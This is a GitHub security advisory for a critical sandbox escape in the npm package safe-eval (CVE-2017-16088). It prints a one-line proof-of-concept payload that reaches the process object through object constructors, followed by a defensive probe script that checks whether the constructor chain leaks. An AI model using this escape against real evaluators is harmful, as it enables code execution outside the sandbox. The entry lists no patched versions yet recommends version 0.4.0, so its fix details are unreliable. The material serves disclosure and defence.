
Sandbox Breakout in safe-eval

Critical severity • GitHub Reviewed • Published Jul 18, 2018 to the GitHub Advisory Database • Updated Sep 11, 2023

Package

safe-eval (npm)

Affected versions

<= 0.3.0

Patched versions

None

Description

Affected versions of safe-eval are vulnerable to a sandbox escape. By accessing object constructors, unsanitized user input can reach the entire standard library and effectively break out of the sandbox.

Proof of Concept:

This code accesses the process object and calls .exit():

var safeEval = require('safe-eval');
safeEval("this.constructor.constructor('return process')().exit()");
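
The check below is an added example, not code from the advisory or from safe-eval: it walks the same constructor chain as the proof of concept but only reports what the chain resolves to. Node's built-in vm module is an assumed stand-in for the sandboxed evaluator, and evaluate, probeConstructorChain and the two sample contexts are hypothetical names constructed for illustration.

```javascript
const vm = require('vm');

// Assumption: Node's built-in vm module stands in for the sandboxed evaluator.
// Pass your own evaluator as the second argument to probe that instead.
function evaluate(code, context) {
  return vm.runInNewContext(code, context);
}

// Walks the constructor chain from the proof of concept, but only inspects
// what it resolves to; nothing is called on the process object.
function probeConstructorChain(context, run = evaluate) {
  const result = { resolved: false, hostFunctionLeaked: false, processReachable: false };
  let fn;
  try {
    fn = run('this.constructor.constructor', context);
  } catch (err) {
    return result; // the chain could not be resolved at all
  }
  if (typeof fn !== 'function') return result;
  result.resolved = true;
  // Identity with this realm's Function means sandboxed input can compile
  // and run code outside the sandbox.
  result.hostFunctionLeaked = fn === Function;
  try {
    // A function built by the leaked constructor sees the host's globals.
    result.processReachable = fn('return typeof process')() !== 'undefined';
  } catch (err) {
    result.processReachable = false;
  }
  return result;
}

// Constructed contexts: an object literal inherits from the host's
// Object.prototype; a null-prototype object does not.
const inherited = probeConstructorChain({});
const nullProto = probeConstructorChain(Object.create(null));
console.log({ inherited, nullProto });
```

A clean result for this one chain does not make an evaluator a security boundary; Node's documentation states that the vm module is not a security mechanism.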

Recommendation

Update to version 0.4.0 or later

References

Published to the GitHub Advisory Database Jul 18, 2018
Reviewed Jun 16, 2020
Last updated Sep 11, 2023

Severity

Critical 10.0 / 10

CVSS base metrics

Attack vector: Network
Attack complexity: Low
Privileges required: None
User interaction: None
Scope: Changed
Confidentiality: High
Integrity: High
Availability: High
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Weaknesses

CVE ID

CVE-2017-16088

GHSA ID

GHSA-ww6v-677g-p656

Source code

No known source code